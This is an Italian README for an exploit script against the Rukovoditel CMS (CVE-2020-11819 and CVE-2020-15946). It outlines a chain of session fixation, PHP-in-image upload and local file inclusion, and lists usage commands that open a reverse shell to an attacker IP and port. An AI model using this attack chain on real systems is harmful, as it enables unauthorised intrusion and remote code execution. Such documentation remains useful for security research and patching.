
Prova di concetto per CVE-2020-11819 e CVE-2020-15946
Prova di concetto per CVE-2020-11819 e CVE-2020-15946. Testato su Rukovoditel 2.4.x, 2.5.x e 2.6.1
Questo exploit ha due modalità di esecuzione, usando la vulnerabilità di session fixation (CVE-2020-15946) o utilizzando le credenziali di accesso di qualsiasi account sotto qualsiasi profilo. Con l'opzione --type L, questo script creerà un link malevolo, se la vittima accede al link tramite un browser, verrà impostato un identificatore di sessione arbitrario che verrà utilizzato per rubare la loro sessione dopo aver caricato un'immagine con contenuto PHP nel loro profilo fotografico, e quindi utilizzare local file include (CVE-2020-11819) per ottenere una bella reverse shell oppure, con le opzioni --type C -u -p puoi fornire le credenziali, caricare l'immagine con contenuto PHP e utilizzare la local file inclusion (CVE-2020-11819) per ottenere l'esecuzione del codice.
Consiglio: ricordati di verificare se il modulo di registrazione è abilitato ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
RCE post-autenticazione per rukovoditel, versione script 1.0
optional arguments:
-h, --help mostra questo messaggio di aiuto ed esce
-t URL, --target URL URL/Percorso completo del CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Nome utente per l'autenticazione
-p PASSWORD, --password PASSWORD Password per l'autenticazione
-a TYPE, --type TYPE Usa -a L per generare il link e rubare la sessione o usa -a C se disponi di credenziali di accesso all'applicazione web
--ip IP_ATTACKER IP dell'attaccante per la reverse shell!
--port PORT_ATTACKER Porta per la connessione della reverse shell
--proxy PROXY Imposta un proxy http per il debug http://127.0.0.1:8080